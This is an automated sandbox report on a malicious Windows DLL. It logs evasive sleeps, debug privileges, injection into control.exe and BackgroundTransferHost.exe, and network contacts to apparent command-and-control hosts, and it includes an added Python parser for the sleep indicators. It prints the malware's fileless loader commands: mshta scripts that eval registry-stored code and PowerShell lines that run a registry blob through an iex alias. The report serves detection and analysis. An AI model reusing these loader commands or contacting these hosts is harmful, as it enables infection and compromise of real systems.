Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7084 Thread sleep time: -1773297476s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7084 Thread sleep count: 799 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5772 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612 Thread sleep count: 6259 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676 Thread sleep count: 2927 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2620 Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648 Thread sleep count: 6479 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704 Thread sleep count: 2798 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 452 Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5152 Thread sleep time: -11990383647911201s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\regsvr32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 390
Source: C:\Windows\SysWOW64\regsvr32.exe Window / User API: threadDelayed 799
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1425
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 506
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1129
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1555
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 870
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 862
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6259
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2927
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6479
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2798
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1803
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6739
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2705
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361113599.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.338033120.000000000336B000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWh4[
Source: rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914184707.0000000000FA1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.338394833.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW-b^u
Source: mshta.exe, 00000016.00000003.382843473.000001823555B000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\7p
Source: loaddll32.exe, 00000000.00000003.522936760.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317739016.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.686994186.0000000001344000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.523272114.000000000130A000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361113599.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.338033120.000000000336B000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000004.00000003.811718040.0000000000F5A000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW@
Source: mshta.exe, 00000017.00000002.390538379.000002B5EF59B000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
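The sleep lines above are raw sandbox output: relative NtDelayExecution intervals printed as negative numbers, thread sleep counts compared against a threshold of 30, and "threadDelayed" loop counters. The Python below is an added example, not part of this report or of the sandbox vendor's code, that parses lines of exactly that shape and turns them into per-process evasion verdicts. Two assumptions are made and marked in the code: the printed magnitude is taken to be milliseconds despite the "s" suffix (the -30000 threshold and the report's own "long sleeps (>= 3 min)" signature are consistent with that), and 922337203685477, which is floor((2^63-1)/10^4), is treated as 0x7FFFFFFFFFFFFFFF 100-ns ticks, the largest relative delay the kernel accepts, i.e. a thread parked until the analysis timer expires. The sample lines are constructed from values in this section.

```python
import re
from collections import defaultdict

# Constructed sample lines; shape and values copied from the report's
# "Malware Analysis System Evasion" section, nothing else.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7084 Thread sleep time: -1773297476s >= -30000s",
    r"Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7084 Thread sleep count: 799 > 30",
    r"Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5772 Thread sleep time: -30000s >= -30000s",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224 Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612 Thread sleep count: 6259 > 30",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1425",
]

# ASSUMPTION: the report prints |interval| in milliseconds although it writes "s".
# A relative LARGE_INTEGER of 0x7FFFFFFFFFFFFFFF 100-ns ticks is the longest wait
# NtDelayExecution accepts; in ms that is floor((2**63-1)/10**4) = 922337203685477,
# exactly the value seen in the powershell.exe lines.
MAX_RELATIVE_DELAY_MS = (2**63 - 1) // 10_000
LONG_SLEEP_MS = 3 * 60 * 1000        # the report's "long sleeps (>= 3 min)" cut-off
LOOP_COUNT_THRESHOLD = 30            # the report's "sleep count > 30" cut-off

LINE_RES = {
    "sleep_time": re.compile(r"^Source: (?P<image>.+?) TID: (?P<tid>\d+) Thread sleep time: -(?P<value>\d+)s"),
    "sleep_count": re.compile(r"^Source: (?P<image>.+?) TID: (?P<tid>\d+) Thread sleep count: (?P<value>\d+)"),
    "delayed": re.compile(r"^Source: (?P<image>.+?) Thread delayed: delay time: (?P<value>\d+)"),
    "thread_delayed_loop": re.compile(r"^Source: (?P<image>.+?) Window / User API: threadDelayed (?P<value>\d+)"),
}


def parse_line(line):
    """Return (kind, image, value) for a recognised evasion line, else None."""
    for kind, rx in LINE_RES.items():
        m = rx.match(line)
        if m:
            return kind, m.group("image"), int(m.group("value"))
    return None


def classify_delay_ms(ms):
    """Bucket a single relative delay: normal / long (>= 3 min) / infinite (max LARGE_INTEGER)."""
    if ms >= MAX_RELATIVE_DELAY_MS:
        return "infinite"   # thread never wakes; the sandbox clock runs out first
    if ms >= LONG_SLEEP_MS:
        return "long"
    return "normal"


def summarize(lines):
    """Aggregate per-image indicators: longest delay, summed loop iterations, verdict set."""
    per_image = defaultdict(lambda: {"max_delay_ms": 0, "loop_iterations": 0, "verdicts": set()})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        kind, image, value = parsed
        entry = per_image[image]
        if kind in ("sleep_time", "delayed"):
            entry["max_delay_ms"] = max(entry["max_delay_ms"], value)
            verdict = classify_delay_ms(value)
            if verdict != "normal":
                entry["verdicts"].add(f"{verdict}_sleep")
        else:
            # sleep_count and threadDelayed are iteration counters of a delay loop
            entry["loop_iterations"] += value
            if value > LOOP_COUNT_THRESHOLD:
                entry["verdicts"].add("sleep_loop")
    return dict(per_image)


if __name__ == "__main__":
    for image, info in summarize(SAMPLE_LINES).items():
        print(f"{image}: max_delay_ms={info['max_delay_ms']} "
              f"loops={info['loop_iterations']} verdicts={sorted(info['verdicts'])}")
```

Run on the constructed lines, powershell.exe comes out with both an infinite sleep and a sleep loop, regsvr32.exe with a long sleep and a sleep loop, and rundll32.exe with a sleep loop only; a line whose delay is exactly the 30000 threshold classifies as normal.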

Anti Debugging:

Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: berukoneru.website
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 79.110.52.144 187
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: windows.update3.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 18.219.227.107 187
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 3.12.124.139 187
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\BackgroundTransferHost.exe base: 7FF65B0E12E0
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\BackgroundTransferHost.exe base: 7FF65B0E12E0
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3472
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3472
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3472
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 9B851580
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
